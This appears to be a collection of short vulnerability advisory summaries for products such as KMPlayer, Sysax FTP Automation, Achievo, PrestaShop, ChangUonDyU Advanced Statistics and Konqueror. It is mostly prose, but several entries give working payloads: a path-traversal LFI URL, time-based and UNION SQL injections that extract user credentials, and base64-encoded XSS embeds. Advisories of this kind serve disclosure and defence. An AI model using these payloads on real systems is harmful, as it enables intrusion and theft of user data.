All sensitive functions are lacking CSRF protection. One example below is a request showing that no authorization token is required for the creation of an FTP user called 'fun'. This could also be used to deliver both XSS and SQLi examples. The 'inFullname' parameter is vulnerable to XSS: the user's real name is not sanitized when it is displayed within the control panel. The 'inDestination' parameter is vulnerable to SQL injection. The 'inPassword' parameter is vulnerable to a password reset attack.
A buffer overflow vulnerability exists in The KMPlayer v3.3.0.33 which can be exploited by malicious people to compromise a user's system. A DLL hijacking vulnerability is also present which can be exploited by malicious people to compromise a user's system. Successful exploitation of the buffer overflow vulnerability requires that a user is tricked into opening a specially crafted file. Successful exploitation of the DLL hijacking vulnerability requires that a user is tricked into running the application from a malicious directory.
Sysax FTP Automation <= 5.33 has a privilege escalation vulnerability. This can be exploited by leveraging the Scheduled Script -> Scheduled Task functionality. The scheduled task function allows you to run any external program/executable you want, without specifying credentials. By default, this product installs as a LOCALSYSTEM service, so when the binary is executed, it runs under that context.
A stack exhaustion vulnerability exists during the handling of PDF files, which can trigger a denial of service condition.
Spider WordPress Product Catalog plugin is a convenient tool for organizing the products represented on your website into catalogs. Each product in the catalog is assigned a relevant category, which makes it easier for customers to search for and identify the needed products within the WordPress catalog. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product in the catalog. Moreover, each product in the catalog can be accompanied by an image. The flaw occurs when product reviews are submitted via "view=showproduct": the form's $_POST data is not validated, so an attacker can submit arbitrary code, which is then stored in the database.
Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in version 1.4.5. XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid, atkselector, atkfilter, searchString) LFI: http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3 SQL Injection: http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
When installing and analyzing PrestaShop in a secure environment it was discovered that it is possible to bypass the isCleanHtml() function, which is used in many places, in this case in particular the Contact Form. A user could use this vulnerability, a Persistent Cross-site Scripting, to execute malicious payloads in the admin's message box. Proof of concept: In the message field a user could write: <object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgid2Vic2VndXJhLm5ldC14c3MiKTwvc2NyaXB0Pg=='></object> or <embed src='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIndlYnNlZ3VyYS5uZXQgeHNzIik7PC9zY3JpcHQ+PC9zdmc+' type='image/svg+xml' AllowScriptAccess='always'></embed>. Both Base64 strings are essentially an encoded <script>alert()</script>.
SQL Injection was found in ChangUonDyU Advanced Statistics. Query on ajax.php. Exploitation: ajax.php?do=inforum&listforumid=100) UNION SELECT 1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20 or: ajax.php?do=inforum&listforumid=100) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user where userid=1-- -&result=20
WordPress All Video Gallery 1.1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'vid' in the 'config.php' file. This can allow the attacker to gain access to the database and extract sensitive information.
The Konqueror web browser is vulnerable to a number of memory corruption vulnerabilities. This advisory comes in 4 related parts: 1) The Konqueror web browser is vulnerable to type confusion leading to memory disclosure. 2) The Konqueror web browser is vulnerable to an out-of-bounds memory access when accessing the canvas. 3) The Konqueror web browser is vulnerable to a NULL pointer dereference leading to a crash. 4) The Konqueror web browser is vulnerable to a "use-after-free" class flaw when the context menu is used whilst the document DOM is being changed from within JavaScript.